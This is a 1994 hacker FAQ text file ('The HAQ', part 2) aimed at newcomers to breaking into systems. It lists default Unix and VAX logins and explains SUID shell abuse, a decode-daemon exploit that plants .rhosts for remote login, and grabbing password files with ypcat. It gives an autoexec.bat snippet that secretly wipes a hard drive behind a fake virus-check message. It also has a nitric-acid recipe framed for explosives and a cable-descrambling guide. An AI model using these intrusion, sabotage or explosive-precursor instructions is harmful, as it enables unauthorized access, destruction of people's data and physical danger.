home *** CD-ROM | disk | FTP | other *** search
/ Ian & Stuart's Australian Mac: Not for Sale / Another.not.for.sale (Australia).iso / hold me in your arms / hack94 / HAQ2.TXT < prev    next >
Text File  |  1994-06-14  |  31KB  |  779 lines

  1.                    Capture file opened 14-Jun-1994 05:47p
  2.  
  3.  
  4.  _____________
  5. /      /     /             ***     ***      ******       ******
  6.       /                     ***     ***    *********    *********
  7.      /       /               ***     ***  ***     ***  ***     ***
  8.     /       /                 ***********  ***********  ***     ***
  9.    /       /_____    ______    ***********  ***********  ***  ** ***
  10.   /       /     /   /_____/     ***     ***  ***     ***  ***   *****
  11.  /       /     /   /             ***     ***  ***     ***   ***********
  12. /       /     /   /______         ***     ***  ***     ***   *****   ***
  13.  
  14.  
  15.                           +---------------+
  16.                           |    THE HAQ    |
  17.                           | Edition  2.07 |
  18.                           |  11 JUN 1994  |
  19.                           +---------------+
  20.  
  21.                              File 2 of 3
  22.  
  23. =====================================================================
  24. VI. NEWBIES READ THIS
  25.      (Basic Hacking)
  26.  
  27. WHAT MAKES A SYSTEM SECURE?
  28. (from alt.security FAQ)
  29. "The only system which is truly secure is one which is switched off
  30. and unplugged, locked in a titanium lined safe, buried in a concrete
  31. bunker, and is surrounded by nerve gas and very highly paid armed
  32. guards.  Even then I wouldn't stake my life on it."
  33.                                      - originally from Gene Spafford
  34.  
  35. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  36.  
  37. WHAT WOULD BE IDEAL PROTECTION OF A SYSTEM?
  38. Password Access- Get rid of simple passwords; routinely change all
  39.                  passwords; regular review/monitoring of password
  40.                  files
  41.  
  42. Physical Access- Lock up terminals, personal computers, disks when
  43.                  not in use; eliminate unnecessary access lines;
  44.                  disconnect modems when not in use
  45.  
  46. Other measures-  Know who you are talking to; shred all documents;
  47.                  avoid public domain software; report suspicious
  48.                  activity (especially non-working hours access)
  49.  
  50. What this all means is that hackers must now rely on the ineptitude
  51. and laziness of the users of the system rather than the ignorance
  52. of SysOps.  The SysOps and SecMans (Security Managers) are getting
  53. smarter and keeping up to date.  Not only that, but they are
  54. monitoring the hack/phreak BBSes and publications.  So the bottom
  55. line is reveal nothing to overinquisitive newbies...they may be
  56. working for the wrong side.
  57.  
  58. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  59.  
  60. WHAT IS A FIREWALL?
  61. (from the comp.security.misc FAQ)
  62. A (Internet) firewall is a machine which is attached (usually)
  63. between your site and a Wide Area Network (WAN).  It provides
  64. controllable filtering of network traffic, allowing restricted
  65. access to certain Internet port numbers and blocks access to
  66. pretty well everything else.
  67.  
  68. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  69.  
  70. HOW TO HACK WITHOUT GETTING INTO TROUBLE AND DAMAGING COMPUTERS?
  71.  1.  Don't do damage intentionally.
  72.  2.  Don't alter files other than than to hide your presence or to
  73.      remove traces of your intrusion.
  74.  3.  Don't leave any real name, handle, or phone number on any
  75.      system.
  76.  4.  Be careful who you share info with.
  77.  5.  Don't leave your phone number with anyone you don't know.
  78.  6.  Do NOT hack government computers.
  79.  7.  Don't use codes unless you HAVE too.
  80.  8.  Be paranoid!
  81.  9.  Watch what you post on boards, be as general as possible.
  82. 10.  Ask questions...but do it politely and don't expect to have
  83.      everything handed to you.
  84.  
  85. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  86.  
  87. WHAT DO I DO IF I AM GETTING NOWHERE?
  88. 1.  Change parity, data length, and stop bits.  The system may not
  89.     respond to 8N1 (most common setting) but may respond to 7E1,8E2,
  90.     7S2, etc.
  91. 2.  Change baud rates.
  92. 3.  Send a series of carriage returns.
  93. 4.  Send a hard break followed by a carriage return.
  94. 5.  Send control characters.  Work from ^a to ^z.
  95. 6.  Change terminal emulation.
  96. 7.  Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, GO,
  97.     LOGON, JOIN, HELP, or anything else you can think off.
  98.  
  99. =====================================================================
  100. VII. Screwing with the most widespread operating system on the net
  101.      (UNIX / AIX Hacking)
  102.  
  103. WHAT ARE COMMON DEFAULT ACCOUNTS ON UNIX?
  104. (from Belisarius)
  105. Common default accounts are root, admin, sysadmin, unix, uucp, rje,
  106. guest, demo, daemon, sysbin.  These accounts may be unpassworded
  107. or the password may possibly be the same (i.e. username uucp has
  108. uucp as the passwd).
  109.  
  110. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  111.  
  112. HOW IS THE UNIX PASSWORD FILE SETUP?
  113. (from Belisarius)
  114. The password file is usually called /etc/passwd
  115. Each line of the passwd file of a UNIX system follows the following
  116. format:
  117.  
  118.  
  119.     userid:password:userid#:groupid#:GECOS field:home dir:shell
  120.  
  121.  
  122. What each of these fields mean/do---
  123.  
  124. userid       -=>  the userid name, entered at login and is what the
  125.                   login searches the file for.  Can be a name or a
  126.                   number.
  127.  
  128. password     -=>  the password is written here in encrypted form.
  129.                   The encryption is one way only.  When a login
  130.                   occurs the password entered is run through the
  131.                   encryption algorithm (along with a salt) and then
  132.                   contrasted to the version in the passwd file that
  133.                   exists for the login name entered.  If they match,
  134.                   then the login is allowed.  If not, the password is
  135.                   declared invalid.
  136.  
  137. userid#      -=>  a unique number assigned to each user, used for
  138.                   permissions
  139.  
  140. groupid#     -=>  similar to userid#, but controls the group the user
  141.                   belongs to.  To see the names of various groups
  142.                   check /etc/group
  143.  
  144. GECOS FIELD  -=>  this field is where information about the user is
  145.                   stored.  Usually in the format  full name, office
  146.                   number, phone number, home phone.  Also a good
  147.                   source of info to try and crack a password.
  148.  
  149. home dir     -=>  is the directory where the user goes into
  150.                   the system at (and usually should be brought
  151.                   to when a cd is done)
  152.  
  153. shell        -=>  this is the name of the shell which is
  154.                   automatically started for the login
  155.  
  156. Note that all the fields are separated by colons in the passwd file.
  157.  
  158. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  159.  
  160. WHAT DO THOSE *s, !s, AND OTHER SYMBOLS MEAN IN THE PASSWD FILE?
  161. (from Belisarius)
  162. Those mean that the password is shadowed in another file.  You have
  163. to find out what file, where it is and so on.  Ask somebody on your
  164. system about the specifics of the Yellow Pages system, but
  165. discretely!
  166.  
  167. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  168.  
  169. WHAT IS A UNIX TRIPWIRE?
  170. (from Belisarius)
  171. Tripwire is a tool for Unix admins to use to detect password cracker
  172. activity, by checking for changed files, permissions, etc.  Good for
  173. looking for trojan horses like password stealing versions of
  174. telnet/rlogin/ypcat/uucp/etc, hidden setuid files, and the like.
  175.  
  176. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  177.  
  178. USING SUID/GUID PROGS TO FULL ADVANTAGE.
  179. (from Abort)
  180. A SUID program is a program that when executed has the privs of the
  181. owner.
  182. A GUID has the privs of the group when executed.
  183. Now imagine a few things (which happen often in reality):
  184. 1.  Someone has a SUID program on their account, it happens to allow
  185. a shell to, like @ or jump to a shell.  If it does that, after you
  186. execute said file and then spawn a shell off of it, all you do
  187. in that shell has the privs of that owner.
  188. 2. If there is no way to get a shell, BUT they leave the file
  189. writable, just write over it a script that spawns a shell, and you
  190. got their privs again.
  191.  
  192. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  193.  
  194. HOW CAN I HACK INTO AN AIX MACHINE?
  195. (from Prometheus)
  196.  
  197. If you can get access to the 'console' AIX machines have a security
  198. hole where you can kill the X server and get a shell with
  199. ctrl-alt-bkspce.  Also by starting an xterm up from one you are not
  200. logged in the utmp for that session because the xterms don't do utmp
  201. logging as a default in AIX.  Or try the usual UNIX tricks:
  202. ftping /etc/passwd, tftping /etc/passwd, doing a finger and then
  203. trying each of the usernames with that username as a password.
  204.  
  205. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  206.  
  207. HOW CAN I INCREASE MY DISK QUOTA ON UNIX?
  208. (from Prometheus)
  209.  
  210. A UNIX disk quota may be increased by finding a directory on another
  211. partition and using that.  Find another user who wants more quota and
  212. create a directory for the other to use, one that is world writable.
  213. Once they've put their subdirectory in it, change the perms on the
  214. directory to only read-execute.  The reason this works is that
  215. usually accounts are distributed across a couple of filesystems, and
  216. admins are usually too lazy to give users the same quotas on each
  217. filesystem.  If the users are all on one filesystem, you may be able
  218. to snag some space from one of the /usr/spool directories by creating
  219. a 'hidden' subdirectory like .debug there, and using that.
  220.  
  221. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  222.  
  223. HOW CAN I FOOL AROUND ON XTERM / XWINDOWS?
  224. (from Wildgoose)
  225. Most x commands have a -display option which allows you to pick a
  226. terminal to send to. So if you use bitmap to create a bitmap, or
  227. download one, etc then:
  228.  
  229. xsetroot -bitmap bitmapname
  230. [display the bitmap on your screen]
  231.  
  232. xsetroot -bitmap bitmapname -display xt2500:0
  233. [display the bitmap on another xterm]
  234.  
  235. Other uses, try xterm -display xt??:0 will give someone else one of
  236. your login windows to play with.  They are then logged in as you
  237. though, and can erase your filespace, etc. Beware!
  238.  
  239. Slightly irritating:
  240. xclock -geom 1200x1200 -display xt??:0
  241. [fills the entire screen with a clock]
  242.  
  243. Slightly more irritating:
  244. Use a shell script with xsetroot to flash people's screens different
  245. colors.
  246.  
  247. On the nastier side:
  248. Use a shell script with xsetroot to kill a person's window manager.
  249.  
  250. Downright nasty:
  251. Consult the man pages on xkill.  It is possible to kill windows on
  252. any display.  So to log someone off an xterm you merely have to xkill
  253. their login window.
  254.  
  255. Protect yourself:
  256. If you use xhost -   this will disable other people from being able
  257. to log you out or generally access your terminal.
  258.  
  259. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  260.  
  261. HOW CAN I TAKE ADVANTAGE OF THE DECODE DAEMON?
  262. (from Caustic)
  263. First, you need to make sure that the decode daemon is active.
  264. Check this by telnetting to the smtp port (usually port 25), and
  265. expanding user Decode.  If it gives you something, you can use it.
  266. If it tells you that the user doesn't exist, or whatever, you can't.
  267.  
  268. If the daemon is active, this is how to exploit the decode daemon:
  269. 1) uuencode an echo to .rhosts
  270. 2) pipe that into mail, to be sent to the decode daemon
  271. (What happens: the decode daemon (1st) decodes the process, but
  272. leaves the bin priveleges resident. (2nd) the echo command is
  273. executed, because now the decoded message assumes the bin priveleges
  274. [which are *still* active, even though the daemon didn't issue the
  275. command]).
  276. 3) If this is done right, you will be able to rlogin to the sysem.
  277.  
  278. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  279.  
  280. HOW CAN I GET THE PASSWORD FILE IF IT IS SHADOWED?
  281. (from Belisarius)
  282. If your system has Yellow Pages file managment:
  283.  
  284. ypcat /etc/passwd > whatever.filename
  285.  
  286. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  287.  
  288. HOW IS A PASSWORD ENCRYPTED IN UNIX?
  289. (from UNIX System Security[p.147])
  290.      Password encryption on UNIX is based on a modified version of
  291. the DES [Data Encryption Standard].  Contrary to popular belief, the
  292. typed password is not encrypted.  Rather the password is used as the
  293. key to encrypt a block of zero-valued bytes.
  294.      To begin the encryption, the first seven bits of each character
  295. in the password are extracted to form the 56-bit key.  This implies
  296. that no more than eight characters are significant in a password.
  297. Next, the E table is modified using the salt, which is the first two
  298. characters of the encrypted password (stored in the passwd file).
  299. The purpose of the salt is to makae it difficult to use hardware DES
  300. chips or a precomputed list of encrypted passwords to attack the
  301. algorithm.  The DES algorithm (with the modified E table) is then
  302. invoked for 25 iterations on the block of zeros.  The output of this
  303. encryption, which is 64 bits long, is then coerced into a
  304. 64-character alphabet (A-Z, a-z, 0-9, "." and "/").  Because this
  305. coersion involves translations in which several different values are
  306. represented by the same character, password encryption is essentially
  307. one-way; the result cannot be decrypted.
  308.  
  309. =====================================================================
  310. VIII. Screwing with the most secure operating system on the net
  311.      (VAX/VMS Hacking)
  312.  
  313. WHAT IS VAX/VMS?
  314.  
  315. VAX: Virtual Address eXtension.  Computer is desisgned to use memory
  316.      addresses beyond the actual hardware and can therefore run progs
  317.      larger than physical memory.  Developed by Digital Equipment
  318.      Corporation (DEC).
  319.  
  320. VMS: Virtual Memory System.  Also developed by DEC.
  321.  
  322. DCL: Digital Command Language.  Similar to DOS batch language or
  323.      UNIX script language.
  324.  
  325. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  326.  
  327. WHAT ARE SOME OF THE DEFAULT VAX LOGINS?
  328.      Username      Password
  329.      --------      --------
  330.      DECNET        DECNET
  331.      DEFAULT       DEFAULT
  332.      DEMO          DEMO
  333.                    unpassworded
  334.      FIELD         FIELD
  335.                    SERVICE
  336.      GUEST         GUEST
  337.                    unpassworded
  338.      OPERATOR      OPERATOR
  339.      OPERATIONS    OPERATIONS
  340.      SYSMAINT      SYSMAINT
  341.                    SERVICE
  342.                    DIGITAL
  343.      SYSTEM        SYSTEM
  344.                    MANAGER
  345.                    OPERATOR
  346.                    SYSLIB
  347.      SYSTEST       UETP
  348.                    SYSTEST
  349.      SYSTEST_CLIG  CLIG
  350.                    SYSTEST
  351.                    TEST
  352.      SUPPORT       SUPPORT
  353.                    DEC
  354.  
  355. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  356.  
  357. WHAT ARE SOME OF THE BASIC COMMANDS FROM THE "$" PROMPT?
  358. @: executes a DCL program
  359.      usage- @filename.com
  360. ACCOUNTING: program that tracks usage of the system by users
  361. CREATE: PASCAL compiler
  362.      usage- CREATE filename.pas
  363. CREATE/DIR: create a subdirectory
  364. DEL: delete files
  365.      usage- DEL filename.ext
  366. DIR: list the contents of a directory
  367.      options-  /FULL = full listing with all security info
  368.                /BRIEF = brief listing
  369.                * = wildcard for anything
  370.                % = wildcard for a specific character
  371. EDIT: VMS editor, requires VT-220 terminal
  372. HELP: brings up help info
  373. LOGOUT: obvious
  374. MAIL: send E-mail locally and to any connected networks
  375. $PASSWORD: change your password
  376.      usage- $PASSWORD newpassword
  377. PHONE: chat program
  378.      usage- PHONE changes the prompt to a '%', from there type in
  379.             the username you wish to talk to.  If the user is on a
  380.             different node then enter nodename::username
  381. PHOTO: record session
  382. RUN: execute an executable file
  383. SHOW: lets you look at alot of different stuff
  384.      usage- SHOW option
  385.      options- CLUSTER = VAX cluster, if any
  386.               DEFAULT = directory path and device
  387.               DEVICES = system devices (drives, modems, etc.)
  388.               INTRUSION = accounts being hacked, if any
  389.               MEMORY = obvious
  390.               NETWORK = network name and VAX's location in it
  391.               PROCESS = PROCESS processname shows status
  392.               QUOTA = disk space available for account
  393.               SYSTEM = system info
  394.               DAY = obvious
  395.               TIME = obvious
  396.               USERS = online users
  397. TYPE: display file on terminal (same as DOS 'type' and UNIX 'cat')
  398. SET FILE/PROTECTION: sets the Read/Write/Execute/Delete flags
  399.      usage- SET FILE/PROTECTION=OWNER[RWED] filename.ext
  400.      options- WORLD, GROUP, or SYSTEM can be used in place of OWNER
  401.               WORLD = all users in your world
  402.               GROUP = all users in your group
  403.               SYSTEM = all users with SYSPRV privileges
  404. SET TERMINAL: controls terminal settings
  405.      usage- SET TERMINAL/option
  406.      options- WIDTH=80 = set width to 80 columns
  407.               ADVANCED_VIDEO = selects 124x24 lines
  408.               NOADVANCED_VIDEO = unselects 124x24 lines
  409.               ANSI_CRT = selects ANSI escape sequences
  410.               NOANSI_CRT = unselects ANSI escape sequences
  411.               AUTOBAUD = allows computer to select highest possible
  412.                          baud rate
  413.               NOAUTOBAUD = turn off automatic baud selection
  414.               BROADCAST = allows receipt of SEND, MAIL and PHONE
  415.                           messages
  416.               NOBROADCAST = prevents receiption of SEND, MAIL and
  417.                             PHONE messages
  418.               DEVICE_TYPE=VT220 = set terminal type to VT-220
  419.               ECHO = enables echoing from DCL command line
  420.               NOECHO = disable DCL command line echoing
  421.               FULLDUP = enable full duplex
  422.               NOFULLDUP = disable full duplex
  423.               HANGUP = log off if no carrier
  424.               NOHANGUP = don't log off even if no carrier
  425.               INQUIRE = show device type of terminal
  426.               PAGE=43 = set display length to 43 lines
  427.               TYPE_AHEAD = enable type ahead function
  428.               NOTYPE_AHEAD = disable type ahead function
  429.               UNKNOWN = use for ASCII device types
  430.               WRAP = set wrap around feature
  431.               NOWRAP = unset wrap around feature
  432.  
  433. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  434.  
  435. WHAT ARE COMMON VAX FILENAME EXTENSIONS?
  436.  
  437.           COMPILER SOURCE CODE FILES
  438.           ==========================
  439. ADA = ADA compiler source code file
  440. BAS = BASIC compiler source code file
  441. B32 = BLISS-32 compiler source code file
  442. C   = C compiler source code file
  443. COB = COBOL compiler source code file
  444. FOR = FORTRAN compiler source code file
  445. MAR = MACRO compiler source code file
  446. PAS = PASCAL compiler source code file
  447. PLI = PL/I compiler source code file
  448. OBJ = object code created by compiler before linking
  449.  
  450.           DCL LANGUAGE FILES
  451.           ==================
  452. CLD = DCL command description file
  453. COM = DCL batch file
  454.  
  455.           GENERAL FILES
  456.           =============
  457. DAT = DATa file
  458. DIR = subDIRectory file
  459. EXE = EXEcutable program
  460. HLP = text for HeLP libraries
  461. LIS = system listing files (TYPE, PRINT, PHOTO)
  462. LOG = batch job output
  463. MEM = DSR output file
  464. RNO = DSR source file
  465. SIXEL = file for SIXEL graphics
  466. SYS = SYStem image file
  467. TJL = Trouble JournaL
  468. TMP = TeMPorary file
  469. TXT = text library input file
  470. UAF = User Autorization File
  471.  
  472.           MAIL FILES
  473.           ==========
  474. DIS = DIStribution file
  475. MAI = MAIl message file
  476. TXT = mail output file
  477.  
  478.           EDT EDITOR FILES
  479.           ================
  480. EDT = command file for the EDT editor
  481. JOU = EDT journal when problems occur
  482. TPU = editor command file
  483.  
  484. =====================================================================
  485. IX. Screwing with the most widespread operating system on PCs
  486.      (MS-DOS Hacks)
  487.  
  488. HOW TO REALLY **ERASE** A HARDDRIVE
  489. (from Amarand)
  490. Install a small program (in the Dos directory would be good) called
  491. Wipe, by Norton Utilities.  I am pretty sure that executing this
  492. program, using the proper command line options, you can for one
  493. better than formatting the hard drive.  Wiping the information
  494. changes each bit in the object (file, FAT, disk, hard drive) to a
  495. zero...or a random bit, or an alternating bit instead of just
  496. deleting the reference to it in the file allocation table.  If you
  497. just delete a file, or format a hard drive...with the new Dos you
  498. would only need to let it run its course and then Unformat the drive.
  499. Wipe, I have found, works much more effectively by first erasing the
  500. file allocation table AFTER erasing the information the file
  501. allocation table is used to find.
  502.  
  503. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  504.  
  505. WRITING A .bat FILE TO 'WIPE' A DRIVE.
  506. Add the following code to the end of autoexec.bat:
  507. echo Please wait
  508. echo Checking HardDisk for virii, this make take a while ...
  509. wipe > nothing.txt
  510.  
  511. This prevents any output from Wipe being output.
  512.  
  513. =====================================================================
  514. X. Finding out what that encrypted info is
  515.      (Cracking programs)
  516.  
  517. WHAT ARE PASSWORD CRACKING PROGRAMS?
  518. (from Belisarius)
  519. There are three main cracking programs.  They are Crack, Cracker Jack
  520. and Cops.  The latest versions are 4.1 for Crack and 1.4 for Cracker
  521. Jack.  Crack and COPS run on UNIX and CJack runs on a PC. CJack1.3
  522. runs on any x86 class and CJack1.4 needs at least a 386.  To use any
  523. of these requires access to an unshadowed password file.
  524. They are not programs that try to login to an account.  They take the
  525. password file (/etc/passwd in UNIX is usually the name) and guess the
  526. passwords.
  527.  
  528. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  529.  
  530. WHERE CAN I GET THESE PROGRAMS?
  531.  
  532. Crack:         ftp.virginia.edu         /pub/security
  533. CrackerJack:   bnlux1.bnl.gov           /pub/pezz
  534. COPS:
  535.  
  536. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  537.  
  538. WHAT IS WPCRACK?
  539. WPCRAK is a cracker to break the encryption on WordPerfect files.
  540. It works, but takes a long time to run.
  541.  
  542. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  543.  
  544. WHAT IS PKCRACK?
  545. PKCRACK is a dictionary cracker for PKZIP.  It works.  It's
  546. dictionary, but it works.  Not all that well, as you may have to sift
  547. through multiple possible passwords, but its better than nothing.
  548.  
  549. =====================================================================
  550. XI. How do I keep my info secure
  551.      (PGP / Cryptology)
  552.  
  553. WHAT IS PGP?
  554. (from Belisarius)
  555. PGP stands for Pretty Good Protection, from a company called Pretty
  556. Good Software.  It is a public key encryption program for MS-DOS,
  557. Unix, and Mac.  You create a key pair.  One private (secret) key
  558. and a public key.  The keys are different parts of the whole.  I
  559. distribute my public key and anyone who wants can grab it ad it to
  560. their PGP keyring.  Then when they want to send me a message they
  561. encrypt it with PGP and my public key and then send it.  Only I can
  562. decrypt it because you need my secret key to decode it.  (Trust me
  563. you won't get my secret key)  That is PGP.  Please use it if you
  564. want to communicate anything of a ahhhh....sensitive manner.
  565.  
  566. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  567.  
  568. WHERE CAN I GET PGP?
  569. (from an archie search)
  570.  
  571. FTP sites for PGP=Pretty Good Privacy Public Encryption System
  572. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  573.  
  574. ========
  575. Unix PGP
  576. ========
  577.  
  578. Host 130.149.17.7
  579. Location: /pub/local/ini/security
  580.            FILE -rw-rw-r--     651826  Apr  5 1993  pgp22.tar.Z
  581.  
  582. Host arthur.cs.purdue.edu
  583. Location: /pub/pcert/tools/unix/pgp
  584.            FILE -r--r--r--     651826  Mar  7 1993  pgp22.tar.Z
  585.  
  586. Host coombs.anu.edu.au
  587. Location: /pub/security/cypher
  588.            FILE -r--r--r--     651826  Nov  4 22:28  pgp22.tar.Z
  589.  
  590.  
  591.  
  592. ==========
  593. MS-DOS PGP
  594. ==========
  595.  
  596. Host zero.cypher.com
  597. Location: /pub/pgp
  598.            FILE                                       pgp23a.zip
  599.  
  600. ================
  601. MS-DOS PGP SHELL
  602. ================
  603.  
  604. Host athene.uni-paderborn.de
  605. Location: /pcsoft/msdos/security
  606.            FILE -rw-r--r--      65160  Aug  9 20:00  pgpshe22.zip
  607.  
  608. Host nic.switch.ch
  609. Location: /mirror/msdos/security
  610.            FILE -rw-rw-r--      65160  Aug  9 22:00  pgpshe22.zip
  611.  
  612. Host plains.nodak.edu
  613. Location: /pub/aca/msdos/pgp
  614.            FILE -rw-r--r--      65430  Nov 26 18:28  pgpshe22.zip
  615.  
  616.  
  617. =======
  618. Mac PGP
  619. =======
  620.  
  621. Host plaza.aarnet.edu.au
  622. Location: /micros/mac/info-mac/util
  623.            FILE -r--r--r--     323574  Apr 26 1993  pgp.hqx
  624.  
  625. Host sics.se
  626. Location: /pub/info-mac/util
  627.            FILE -rw-rw-r--     323574  Nov  5 11:20  pgp.hqx
  628.  
  629. Host sumex-aim.stanford.edu
  630. Location: /info-mac/util
  631.            FILE -rw-r--r--     323574  Apr 26 1993  pgp.hqx
  632.  
  633. =====================================================================
  634. XII. Chemistry 101
  635.      (explosive/pyrotechnic component prep)
  636. XIII. Fun things with solder, wires, and parts
  637.        (Underground electronics)
  638.  XIV. Watching television
  639.        (cable, Pay-Per-View(PPV), scrambling)
  640.   XV. What's on the radio waves?
  641.        (Radios and Scanning)
  642.  
  643. HOW TO MAKE NITRIC ACID:
  644. (from Neurophire)
  645.  
  646. Nitric acid is not TOO expensive, but is hard to find except from
  647. chemical supply houses.  Purchases can be traced.(From TBBOM13.TXT)
  648.  
  649. There are several ways to make this most essential of all acids for
  650. explosives. One method by which it could be made will be presented.
  651. again, be reminded that these methods SHOULD NOT BE CARRIED OUT!!
  652.  
  653.      Materials:                             Equipment:
  654.      ----------                             ----------
  655.      sodium nitrate or                      adjustable heat source
  656.      potassium nitrate
  657.                                             retort
  658.      distilled water
  659.                                             ice bath
  660.      concentrated
  661.      sulfuric acid                          stirring rod
  662.  
  663.                                             collecting flask with
  664.                                             stopper
  665.  
  666. 1) Pour 32 milliliters of concentrated sulfuric acid into the retort.
  667.  
  668. 2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of
  669. potassium nitrate. and add this to the acid slowly.  If it all does
  670. not dissolve, carefully stir the solution with a glass rod until
  671. it does.
  672.  
  673. 3) Place the open end of the retort into the collecting flask, and
  674. place the collecting flask in the ice bath.
  675.  
  676. 4) Begin heating the retort, using low heat.  Continue heating until
  677. liquid begins to come out of the end of the retort.  The liquid that
  678. forms is nitric acid.  Heat until the precipitate in the bottom of
  679. the retort is almost dry, or until no more nitric acid is forming.
  680. CAUTION: If the acid is heated too strongly, the nitric acid will
  681. decompose as soon as it is formed.  This can result in the
  682. production of highly flammable and toxic gasses that may explode.
  683. It is a good idea to set the above apparatus up, and then get away
  684. from it.
  685.  
  686.      Potassium nitrate could also be obtained from store-bought black
  687. powder, simply by dissolving black powder in boiling water and
  688. filtering out the sulfur and charcoal. To obtain 68 g of potassium
  689. nitrate, it would be necessary to dissolve about 90 g of black powder
  690. in about one liter of boiling water.  Filter the dissolved solution
  691. through filter paper in a funnel into a jar until the liquid that
  692. pours through is clear. The charcoal and sulfur in black powder are
  693. insoluble in water, and so when the solution of water is allowed to
  694. evaporate, potassium nitrate will be left in the jar.
  695.  
  696. =====================================================================
  697. XIII. Fun things with solder, wires, and parts
  698.      (Underground electronics)
  699.  
  700. HOW TO MAKE HIGH FREQUENCY TONES TO ANNOY SOMEONE?
  701. (from Angel of Death with Belisarius)
  702.  
  703. The idea is to make a simple timing circuit to create a high freq
  704. tone.  The timing circuit is based upon the 555-chip and uses a
  705. simple speaker to convert the pulses from the 555 into sound.
  706.  
  707. Required materials: 555 timer chip, 9 V battery, .01 uF capacitor,
  708.                         100k potentiometer, tweeter speaker, wire
  709.                     (the capacitor and resistor values can vary
  710.                      although that changes the possible freqs)
  711.  
  712.  
  713.                                   -9V (GND)
  714.    [\                              |
  715.    [s\                             |   ________  ________
  716.    [p \                            |  |        \/        |
  717.    [e  +-------+-------------------+--| 1              8 |-- +9V
  718.    [a  |       |                      |                  |
  719.    [k  |       |  | /.01uF CAP        |         5        |
  720.    [e  +-+     +--|(------+-----------| 2       5      7 |
  721.    [r /  |        | \     |           |         5        |
  722.    [ /   |                |           |                  |
  723.    [/    +--------------- | ----------| 3       t      6 |----+
  724.          |                |           |         i        |    |
  725.          |                |           |         m        |    |
  726.          |                |    +9V  --| 4       e      5 |    |
  727.          |                |           |         r        |    |
  728.          |                |           |__________________|    |
  729.          |                |                                   |
  730.          |        /\      |                                   |
  731.          +----\  /  \-----+-----------------------------------+
  732.                \/ 100k POT
  733.  
  734. 555 Timer Pin Connections
  735. -------------------------
  736. Pin 1: Ground (-9V side of bat), one lead of tweeter, one lead
  737.        of capacitor
  738. Pin 2: Pin 6 and other lead of capacitor
  739. Pin 3: Other lead of the tweeter, one lead of the resistor
  740. Pin 4: Pin 8 and the +9V
  741. Pin 5: No connections
  742. Pin 6: Pin 2 and the other lead of the potentiometer
  743. Pin 7: No connections
  744. Pin 8: Pin 4 and the +9V
  745.  
  746. =====================================================================
  747. XIV. Watching television
  748.      (cable, Pay-Per-View(PPV), scrambling)
  749.  
  750. HOW IS CABLE TV SCRAMBLED?
  751. (from Aero)
  752.  
  753. There are three main types of scrambling for cable TV: trap filters,
  754. gernaral scrambling and addressable scrambling.
  755.  
  756. 1.  Trap filters.  Located in the distribution box and physically
  757. prevent the desired channel from reaching your house.  All you see
  758. when this techniques is used is theoretically static (i.e. a blank
  759. channel).  No filter is perfect, so some signal may reach your TV.
  760. This is an older system of cable protection, and it is easy to bypass
  761. (go out to the box and remove the filter).
  762.  
  763. 2.  General scrambling.  This system scrambles the pay channels (all
  764. the channels before they reach the box), and you need a special
  765. decoder to unscramble them.  The most common method of scambling is
  766. to remove the sync signal. This is also easy to get around as you
  767. can buy descramblers.
  768.  
  769. 3.  Addressable descramblers.  The cable box receives the scrambled
  770. channels, but the cable company sends signals to the box telling it
  771. which ones should be unscrambled.  This is the system used by most
  772. pay-per-view systems.  This is a little harder to defeat, but not too
  773. bad if you have the right equipment/friends.
  774.  
